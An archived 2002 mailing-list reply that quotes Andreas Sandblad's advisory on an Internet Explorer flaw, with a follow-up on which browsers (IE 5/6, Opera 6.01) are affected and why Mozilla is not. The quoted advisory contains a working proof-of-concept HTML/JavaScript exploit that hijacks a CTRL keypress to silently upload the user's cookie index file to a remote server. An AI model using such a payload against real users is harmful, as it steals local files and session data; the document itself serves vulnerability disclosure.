On Tue, Jul 23, 2002 at 09:50:30PM +0200, Andreas Sandblad wrote:
>
> - Sandblad advisory #8 -
>
> ---..---..---..---..---..---..---..---..---..---..---..---..----
> Title:    Pressing CTRL in IE is dangerous
> Date:     [2002-07-23]
> Software: Internet Explorer
> Impact:   Pressing CTRL in IE may result in an arbitrary local
>           file being uploaded to a remote server (no exact
>           path needed). If especially sensitive information is
>           uploaded, it may be used to run remote programs.
[snip]
> 1. When a user presses the CTRL key an onkeydown event can be set to
> fire. In the event function the key pressed is changed to 'V'. The result
> will be a paste operation with fewer restrictions.
>
> 2. The content of the clipboard is altered and focus is changed to a
> hidden file upload form. The paste operation will be performed into the
> form, yielding a change of value for the file upload field (not normally
> allowed).
>
> 3. The upload form is submitted automatically (legal javascript operation).
[snip]
> <div id=h style="zoom:0.0001">
> <form name=u enctype="multipart/form-data" method=post action=upload.php>
> <input type=file name=file></form></div>
> <script>
> //uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
> uploadFile="..\\Cookies\\index.dat";
> function gotKey(){
>   if (!event.ctrlKey) return;
>   document.onkeydown = null;
>   event.keyCode = 86;
>   window.clipboardData.setData("Text",uploadFile);
>   (p=document.forms.u.file).focus();
>   p.onpropertychange = function(){document.forms.u.submit()};
> }
> document.onkeydown = gotKey;
> window.onload=function(){document.body.focus()};
> </script>

This was verified to work on various versions of IE 5 and 6, and also on
Opera 6.01 build 1041.  However, Mozilla 1.0rc1 is NOT vulnerable, partly
because of a script error (the onkeypress handler should accept a parameter
instead of referring to 'event' directly), and mostly because of the fact
that in Mozilla, event.keyCode is not settable.
G'luck,
Peter

-- 
Peter Pentchev    roamat_private    roamat_private
PGP key:          http://people.FreeBSD.org/~roam/roam.key.asc
Key fingerprint   FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553
If you think this sentence is confusing, then change one pig.
This archive was generated by hypermail 2b30 : Wed Jul 24 2002 - 11:54:38 PDT